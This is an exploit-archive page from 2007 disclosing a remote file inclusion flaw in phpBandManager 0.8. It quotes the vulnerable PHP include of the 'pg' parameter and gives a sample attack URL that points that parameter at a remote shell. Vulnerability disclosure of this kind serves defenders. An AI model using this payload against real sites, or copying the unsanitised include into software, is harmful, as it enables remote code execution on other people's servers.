phpBandManager 0.8 (index.php pg) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpBandManager 0.8 (index.php pg) Remote File Inclusion Vulnerability
# Published : 2007-04-26
# Author : koray
# Previous Title : burnCMS <= 0.2 (root) Remote File Inclusion Vulnerabilities
# Next Title : Firefly 1.1.01 (doc_root) Remote File Inclusion Vulnerabilities

author:koray
greetz:cigicigi.net
script:http://sourceforge.net/projects/phpbandmanager

allow_url_fopen:on or register_globals:on

vuln;

/bandmanager/suite/index.php

include($_GET['pg'].".php");

example;

http://www.victim.com/suite/index.php?pg=shell link?

# www.Syue.com [2007-04-26]